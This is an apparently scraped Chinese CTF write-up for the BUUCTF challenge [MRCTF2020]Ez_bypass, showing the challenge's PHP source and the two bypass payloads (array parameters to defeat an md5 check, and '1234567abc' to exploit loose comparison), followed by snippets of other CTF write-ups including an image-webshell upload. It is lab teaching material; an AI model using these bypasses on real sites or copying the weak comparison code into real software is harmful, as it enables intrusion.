BUUCTF：[MRCTF2020]Ez_bypass

时间：2023-06-19 19:33:54浏览次数：46

标签：BUUCTF passwd echo gg bypass Ez else id md5

https://buuoj.cn/challenges#[MRCTF2020]Ez_bypass

BUUCTF：[MRCTF2020]Ez_bypass_数组

BUUCTF：[MRCTF2020]Ez_bypass_bc_02

右键查看源代码

include 'flag.php';
$flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}';
if(isset($_GET['gg'])&&isset($_GET['id'])) {
    $id=$_GET['id'];
    $gg=$_GET['gg'];
    if (md5($id) === md5($gg) && $id !== $gg) {
        echo 'You got the first step';
        if(isset($_POST['passwd'])) {
            $passwd=$_POST['passwd'];
            if (!is_numeric($passwd))
            {
                 if($passwd==1234567)
                 {
                     echo 'Good Job!';
                     highlight_file('flag.php');
                     die('By Retr_0');
                 }
                 else
                 {
                     echo "can you think twice??";
                 }
            }
            else{
                echo 'You can not get it !';
            }

        }
        else{
            die('only one way to get the flag');
        }
}
    else {
        echo "You are not a real hacker!";
    }
}
else{
    die('Please input first');
}
}

简单的Bypass，第一层：

(md5($id) === md5($gg) && $id !== $gg)=true

传入数组，使得md5($id)===md5($dd)===null，然后设置两个不同的键值即可

payload：

?id[]=a&gg[]=b

BUUCTF：[MRCTF2020]Ez_bypass_数组_03

第二层：

(!is_numeric($passwd) && $passwd==1234567)=true

payload：

passwd=1234567abc

BUUCTF：[MRCTF2020]Ez_bypass_php_04

标签：BUUCTF,passwd,echo,gg,bypass,Ez,else,id,md5
From： https://blog.51cto.com/u_16159500/6517101

BUUCTF：大流量分析（二）
https://buuoj.cn/challenges#%E5%A4%A7%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90%EF%BC%88%E4%BA%8C%EF%BC%89数据采集D_eth0_NS_20160809_164452.pcap查看下邮件协议：POP、SMTP、IMAP这里只有SMTP追踪TCP流看到了钓鱼邮件解码下这串base64很明显，就是这封钓鱼邮件，而且内容里面有显......
BUUCTF：[GXYCTF2019]禁止套娃
https://buuoj.cn/challenges#[GXYCTF2019]%E7%A6%81%E6%AD%A2%E5%A5%97%E5%A8%83.git泄露，使用GitHackindex.php<?phpinclude"flag.php";echo"flag在哪里呢？<br>";if(isset($_GET['exp'])){if(!preg_match('/data:\/\/|fil......
BUUCTF：[ACTF2020 新生赛]Upload
题目地址：https://buuoj.cn/challenges#[ACTF2020%20%E6%96%B0%E7%94%9F%E8%B5%9B]Upload图片马，filename改为.phtmlhttp://7f46d4ae-8320-44f5-a608-db84399f39e5.node3.buuoj.cn/uplo4d/0094153d9fd2e4a052850a6d656cefb6.phtml......
BUUCTF：[极客大挑战 2019]Upload
题目地址：https://buuoj.cn/challenges#[%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%202019]UploadPOST/upload_file.phpHTTP/1.1Host:b40c1d53-d3d6-43be-9f6d-67c767946f8c.node3.buuoj.cnUser-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64;rv:82.0)Gecko/2010......
BUUCTF: [MRCTF2020]Ezpop
https://buuoj.cn/challenges#[MRCTF2020]Ezpop<?phpclassModifier{protected$var;publicfunctionappend($value){include($value);}publicfunction__invoke(){$this->append($this->var);}}classShow{......
BUUCTF：[ASIS 2019]Unicorn shop
https://buuoj.cn/challenges#[ASIS%202019]Unicorn%20shop功能是一个购物商店，输入商品ID和价钱进行点击购买。源代码中提醒<metacharset="utf-8">很重要html使用的是UTF-8编码id和price都为空点击购买，返回报错及原因从中可以发现源代码是如何处理price的使用的是unicodedata......
BUUCTF：[羊城杯 2020]image_rar
binwalk分析xiao_mi2.mp4发现很多压缩包，压缩了很多图片将xiao_mi2.mp4修改后缀改为xiao_mi2.zip得到一个hint，但这个压缩包密码并不是指当前的zip压缩包继续往后看，解压这些图片之后发现里面只有65.jpg显示不正常010Editor打开65.jpg文件头ara!，非常类似rar压缩包的文件头Rar!，修......
BUUCTF：[UTCTF2020]sstv
https://buuoj.cn/challenges#[UTCTF2020]sstvattachment.wavKali安装QSSTVapt-getinstallqsstvOptions->Configuration->Sound勾选Fromfile然后点击这个小按钮，选择attachment.wav开始解码flag{6bdfeac1e2baa12d6ac5384cdfd166b0}......
BUUCTF：[BSidesSF2019]table-tennis
https://buuoj.cn/challenges#[BSidesSF2019]table-tennisattachment.pcapng在ICMP包的尾部发现html代码，其中有打印base64信息拼接起来就是Q1RGe0p1c3RBUzBuZ0FiMHV0UDFuZ1Awbmd9>>>importbase64>>>base64.b64decode('Q1RGe0p1c3RBUzBuZ0FiMHV0UDFuZ1Awbmd9')b&......
BUUCTF：[GUET-CTF2019]soul sipse
https://buuoj.cn/challenges#[GUET-CTF2019]soul%20sipseout.wav可用Steghide无密码分离出download.txtdownload.txthttps://share.weiyun.com/5wVTIN3下载得到GUET.png，修改为正确的PNG文件头保存得到正常的图片。如下\u0034\u0030\u0037\u0030\u000d\u000a\u0031\u0032\u0033\u0......

BUUCTF：[MRCTF2020]Ez_bypass

相关文章

赞助商

阅读排行